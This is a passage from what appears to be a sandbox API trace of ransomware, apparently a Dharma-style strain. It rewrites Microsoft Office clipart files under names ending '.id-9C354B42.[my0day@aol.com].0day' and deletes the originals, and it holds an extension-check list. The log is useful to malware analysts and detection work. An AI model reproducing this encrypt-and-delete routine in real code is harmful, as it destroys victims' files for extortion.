| out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x344fed4*=0x2466, lpOverlapped=0x0) returned 1 [0270.702] WriteFile (in: hFile=0x380, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x2470, lpNumberOfBytesWritten=0x344fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x344fc9c*=0x2470, lpOverlapped=0x0) returned 1 [0270.703] ReadFile (in: hFile=0x354, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x344fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x344fed4*=0x0, lpOverlapped=0x0) returned 1 [0270.703] WriteFile (in: hFile=0x380, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x344fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x344fc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.703] SetEndOfFile (hFile=0x380) returned 1 [0270.703] CloseHandle (hObject=0x380) returned 1 [0270.703] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.703] SetEndOfFile (hFile=0x354) returned 1 [0270.706] CloseHandle (hObject=0x354) returned 1 [0270.707] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0270.817] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_02.mid")) returned 1 [0270.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63 [0270.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63 [0270.823] lstrlenW (lpString=".doc") returned 4 [0270.823] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0270.823] lstrlenW (lpString=".docx") returned 5 [0270.823] lstrcmpiW (lpString1=".docx", lpString2="2.MID") returned -1 [0270.823] lstrlenW (lpString=".pdf") returned 4 [0270.823] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0270.823] lstrlenW (lpString=".xls") returned 4 [0270.823] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0270.823] lstrlenW (lpString=".xlsx") returned 5 [0270.823] lstrcmpiW (lpString1=".xlsx", lpString2="2.MID") returned -1 [0270.823] lstrlenW (lpString=".ppt") returned 4 [0270.823] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0270.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63 [0270.823] lstrlenW (lpString=".zip") returned 4 [0270.823] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0270.823] lstrlenW (lpString=".rar") returned 4 [0270.823] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0270.823] lstrlenW (lpString=".bz2") returned 4 [0270.823] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0270.823] lstrlenW (lpString=".7z") returned 3 [0270.823] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0270.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63 [0270.823] lstrlenW (lpString=".dbf") returned 4 [0270.823] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0270.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63 [0270.823] lstrlenW (lpString=".1cd") returned 4 [0270.823] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0270.824] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63 [0270.824] lstrlenW (lpString=".jpg") returned 4 [0270.824] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0270.824] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63 [0270.824] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63 [0270.824] lstrlenW (lpString=".doc") returned 4 [0270.824] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0270.824] lstrlenW (lpString=".docx") returned 5 [0270.824] lstrcmpiW (lpString1=".docx", lpString2="2.MID") returned -1 [0270.824] lstrlenW (lpString=".pdf") returned 4 [0270.824] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0270.824] lstrlenW (lpString=".xls") returned 4 [0270.824] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0270.824] lstrlenW (lpString=".xlsx") returned 5 [0270.824] lstrcmpiW (lpString1=".xlsx", lpString2="2.MID") returned -1 [0270.824] lstrlenW (lpString=".ppt") returned 4 [0270.824] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0270.824] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63 [0270.824] lstrlenW (lpString=".zip") returned 4 [0270.824] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0270.824] lstrlenW (lpString=".rar") returned 4 [0270.824] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0270.824] lstrlenW (lpString=".bz2") returned 4 [0270.824] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0270.824] lstrlenW (lpString=".7z") returned 3 [0270.824] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0270.824] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63 [0270.824] lstrlenW (lpString=".dbf") returned 4 [0270.824] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0270.825] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63 [0270.825] lstrlenW (lpString=".1cd") returned 4 [0270.825] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0270.825] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63 [0270.825] lstrlenW (lpString=".jpg") returned 4 [0270.825] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0270.825] lstrcmpiW (lpString1=".MID", lpString2=".0day") returned 1 [0270.825] lstrlenW (lpString="PARNT_01.MID") returned 12 [0270.825] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0270.825] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x344ff1c | out: lpFileSize=0x344ff1c*=6491) returned 1 [0270.825] CloseHandle (hObject=0x1fc) returned 1 [0270.825] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_01.mid")) returned 0x20 [0270.825] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_01.mid.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0270.826] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0270.826] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.826] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.826] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_01.mid.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0270.826] GetLastError () returned 0x0 [0270.826] ReadFile (in: hFile=0x1fc, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x344fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x344fed4*=0x195b, lpOverlapped=0x0) returned 1 [0270.976] WriteFile (in: hFile=0x2cc, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x1960, lpNumberOfBytesWritten=0x344fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x344fc9c*=0x1960, lpOverlapped=0x0) returned 1 [0270.977] ReadFile (in: hFile=0x1fc, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x344fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x344fed4*=0x0, lpOverlapped=0x0) returned 1 [0270.977] WriteFile (in: hFile=0x2cc, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x344fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x344fc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.977] SetEndOfFile (hFile=0x2cc) returned 1 [0270.977] CloseHandle (hObject=0x2cc) returned 1 [0270.977] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.977] SetEndOfFile (hFile=0x1fc) returned 1 [0270.981] CloseHandle (hObject=0x1fc) returned 1 [0270.981] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0270.981] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_01.mid")) returned 1 [0270.981] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 63 [0270.981] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 63 [0270.981] lstrlenW (lpString=".doc") returned 4 [0270.981] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0270.981] lstrlenW (lpString=".docx") returned 5 [0270.982] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0270.982] lstrlenW (lpString=".pdf") returned 4 [0270.982] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0270.982] lstrlenW (lpString=".xls") returned 4 [0270.982] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0270.982] lstrlenW (lpString=".xlsx") returned 5 [0270.982] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0270.982] lstrlenW (lpString=".ppt") returned 4 [0270.982] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0270.982] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 63 [0270.982] lstrlenW (lpString=".zip") returned 4 [0270.982] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0270.982] lstrlenW (lpString=".rar") returned 4 [0270.982] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0270.982] lstrlenW (lpString=".bz2") returned 4 [0270.982] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0270.982] lstrlenW (lpString=".7z") returned 3 [0270.982] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0270.982] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 63 [0270.982] lstrlenW (lpString=".dbf") returned 4 [0270.982] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0270.982] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 63 [0270.982] lstrlenW (lpString=".1cd") returned 4 [0270.982] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0270.982] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 63 [0270.982] lstrlenW (lpString=".jpg") returned 4 [0270.982] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0270.982] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 63 [0270.982] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 63 [0270.982] lstrlenW (lpString=".doc") returned 4 [0270.982] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0270.982] lstrlenW (lpString=".docx") returned 5 [0270.982] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0270.982] lstrlenW (lpString=".pdf") returned 4 [0270.983] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0270.983] lstrlenW (lpString=".xls") returned 4 [0270.983] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0270.983] lstrlenW (lpString=".xlsx") returned 5 [0270.983] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0270.983] lstrlenW (lpString=".ppt") returned 4 [0270.983] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0270.983] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 63 [0270.983] lstrlenW (lpString=".zip") returned 4 [0270.983] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0270.983] lstrlenW (lpString=".rar") returned 4 [0270.983] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0270.983] lstrlenW (lpString=".bz2") returned 4 [0270.983] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0270.983] lstrlenW (lpString=".7z") returned 3 [0270.983] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0270.983] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 63 [0270.983] lstrlenW (lpString=".dbf") returned 4 [0270.983] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0270.983] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 63 [0270.983] lstrlenW (lpString=".1cd") returned 4 [0270.983] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0270.983] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 63 [0270.983] lstrlenW (lpString=".jpg") returned 4 [0270.983] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0270.983] lstrcmpiW (lpString1=".MID", lpString2=".0day") returned 1 [0270.983] lstrlenW (lpString="PARNT_02.MID") returned 12 [0270.983] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_02.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0270.988] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x344ff1c | out: lpFileSize=0x344ff1c*=5714) returned 1 [0270.988] CloseHandle (hObject=0x380) returned 1 [0270.988] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_02.mid")) returned 0x20 [0270.988] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_02.mid.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0270.988] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_02.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0270.988] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.988] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.988] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_02.mid.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0270.990] GetLastError () returned 0x0 [0270.990] ReadFile (in: hFile=0x380, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x344fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x344fed4*=0x1652, lpOverlapped=0x0) returned 1 [0270.992] WriteFile (in: hFile=0x384, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x1660, lpNumberOfBytesWritten=0x344fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x344fc9c*=0x1660, lpOverlapped=0x0) returned 1 [0270.993] ReadFile (in: hFile=0x380, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x344fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x344fed4*=0x0, lpOverlapped=0x0) returned 1 [0270.993] WriteFile (in: hFile=0x384, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x344fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x344fc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.993] SetEndOfFile (hFile=0x384) returned 1 [0270.993] CloseHandle (hObject=0x384) returned 1 [0270.993] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.993] SetEndOfFile (hFile=0x380) returned 1 [0270.997] CloseHandle (hObject=0x380) returned 1 [0270.997] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0270.998] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_02.mid")) returned 1 [0270.998] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 63 [0270.998] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 63 [0270.998] lstrlenW (lpString=".doc") returned 4 [0270.998] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0270.998] lstrlenW (lpString=".docx") returned 5 [0270.998] lstrcmpiW (lpString1=".docx", lpString2="2.MID") returned -1 [0270.998] lstrlenW (lpString=".pdf") returned 4 [0270.998] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0270.998] lstrlenW (lpString=".xls") returned 4 [0270.998] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0270.998] lstrlenW (lpString=".xlsx") returned 5 [0270.998] lstrcmpiW (lpString1=".xlsx", lpString2="2.MID") returned -1 [0270.998] lstrlenW (lpString=".ppt") returned 4 [0270.998] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0270.998] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 63 [0270.998] lstrlenW (lpString=".zip") returned 4 [0270.998] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0270.998] lstrlenW (lpString=".rar") returned 4 [0270.998] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0270.998] lstrlenW (lpString=".bz2") returned 4 [0270.998] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0270.998] lstrlenW (lpString=".7z") returned 3 [0270.998] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0270.998] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 63 [0270.998] lstrlenW (lpString=".dbf") returned 4 [0270.998] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0270.998] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 63 [0270.998] lstrlenW (lpString=".1cd") returned 4 [0270.999] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0270.999] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 63 [0270.999] lstrlenW (lpString=".jpg") returned 4 [0270.999] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0270.999] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 63 [0270.999] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 63 [0270.999] lstrlenW (lpString=".doc") returned 4 [0270.999] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0270.999] lstrlenW (lpString=".docx") returned 5 [0270.999] lstrcmpiW (lpString1=".docx", lpString2="2.MID") returned -1 [0270.999] lstrlenW (lpString=".pdf") returned 4 [0270.999] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0270.999] lstrlenW (lpString=".xls") returned 4 [0270.999] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0270.999] lstrlenW (lpString=".xlsx") returned 5 [0270.999] lstrcmpiW (lpString1=".xlsx", lpString2="2.MID") returned -1 [0270.999] lstrlenW (lpString=".ppt") returned 4 [0270.999] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0270.999] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 63 [0270.999] lstrlenW (lpString=".zip") returned 4 [0270.999] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0270.999] lstrlenW (lpString=".rar") returned 4 [0270.999] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0270.999] lstrlenW (lpString=".bz2") returned 4 [0270.999] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0270.999] lstrlenW (lpString=".7z") returned 3 [0270.999] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0270.999] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 63 [0271.000] lstrlenW (lpString=".dbf") returned 4 [0271.000] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0271.000] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 63 [0271.000] lstrlenW (lpString=".1cd") returned 4 [0271.000] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0271.000] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 63 [0271.000] lstrlenW (lpString=".jpg") returned 4 [0271.000] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0271.000] lstrcmpiW (lpString1=".MID", lpString2=".0day") returned 1 [0271.000] lstrlenW (lpString="PARNT_03.MID") returned 12 [0271.000] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_03.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0271.000] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x344ff1c | out: lpFileSize=0x344ff1c*=8538) returned 1 [0271.000] CloseHandle (hObject=0x380) returned 1 [0271.000] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_03.mid")) returned 0x20 [0271.001] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_03.mid.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0271.001] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_03.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0271.001] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.001] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.001] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_03.mid.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0271.001] GetLastError () returned 0x0 [0271.001] ReadFile (in: hFile=0x380, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x344fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x344fed4*=0x215a, lpOverlapped=0x0) returned 1 [0271.003] WriteFile (in: hFile=0x384, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x2160, lpNumberOfBytesWritten=0x344fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x344fc9c*=0x2160, lpOverlapped=0x0) returned 1 [0271.005] ReadFile (in: hFile=0x380, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x344fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x344fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.005] WriteFile (in: hFile=0x384, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x344fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x344fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.005] SetEndOfFile (hFile=0x384) returned 1 [0271.005] CloseHandle (hObject=0x384) returned 1 [0271.005] SetFilePointerEx (in: hFile=0x380, 